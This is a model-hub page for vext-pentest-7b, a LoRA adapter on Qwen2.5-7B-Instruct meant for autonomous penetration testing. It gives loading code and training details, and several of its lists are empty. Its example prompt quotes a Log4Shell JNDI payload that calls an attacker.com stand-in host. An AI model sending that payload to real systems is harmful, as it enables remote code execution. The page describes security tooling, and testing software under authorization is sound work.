Downloads · 30 days
19
46% of all-time downloads
jermenkeller/vext-pentest-7b
vext-pentest-7b is a text generation model from jermenkeller. Use it when you need the model to write or continue text. It is set up for peft. The card lists the license as apache-2.0.
A security-specialized language model by VEXT Labs Inc for autonomous penetration testing and vulnerability assessment.
Downloads · 30 days
19
46% of all-time downloads
All-time downloads
41
Public
Repo size
334 MB
Likes
0
Public
Click a slice to open those files.
.safetensors323 MB · 97%
From the Hugging Face model README
A security-specialized language model by VEXT Labs Inc for autonomous penetration testing and vulnerability assessment.
Built as a LoRA adapter on Qwen/Qwen2.5-7B-Instruct, fine-tuned on real-world security testing data including tool output interpretation, attack planning, vulnerability classification, and remediation guidance.
vext-pentest-7b is trained to:
# Start vLLM with LoRA support
python -m vllm.entrypoints.openai.api_server \
--model Qwen/Qwen2.5-7B-Instruct \
--enable-lora \
--lora-modules vext-pentest-7b=/path/to/adapter \
--max-lora-rank 32
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer
base = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2.5-7B-Instruct", torch_dtype="auto", device_map="auto")
model = PeftModel.from_pretrained(base, "VextLabs/vext-pentest-7b")
tokenizer = AutoTokenizer.from_pretrained("VextLabs/vext-pentest-7b")
messages = [
{"role": "system", "content": "You are a security testing agent. Analyze the following tool output and identify vulnerabilities."},
{"role": "user", "content": "Nuclei scan results:\n[critical] CVE-2021-44228 Log4Shell detected at /api/login\nPOC: ${jndi:ldap://attacker.com/a}"}
]
text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
inputs = tokenizer(text, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=512)
print(tokenizer.decode(output[0], skip_special_tokens=True))
| Parameter | Value |
|---|---|
| Base model | Qwen/Qwen2.5-7B-Instruct |
| Method | LoRA (Low-Rank Adaptation) |
| Rank | 32 |
| Alpha | 64 |
| Target modules | k_proj, v_proj, q_proj, down_proj, o_proj, gate_proj, up_proj |
| Training steps | 5,000 |
| Training samples | 0 |
| Final loss | 0.5114268112182617 |
| Precision | bfloat16 |
Fine-tuned on proprietary security testing data generated by the VEXT platform, including:
Data was collected from authorized testing against intentionally vulnerable applications (OWASP Juice Shop, DVWA, bWAPP, WebGoat, and others) and authorized bug bounty targets.
This model is intended for authorized security testing only. It should be used:
Do not use this model for unauthorized access to computer systems.
VEXT Labs is building autonomous security testing agents that combine LLM reasoning with real security tools. Our agents run full penetration tests — from reconnaissance to exploitation to reporting — with human-level decision making.
Learn more at tryvext.com
Apache 2.0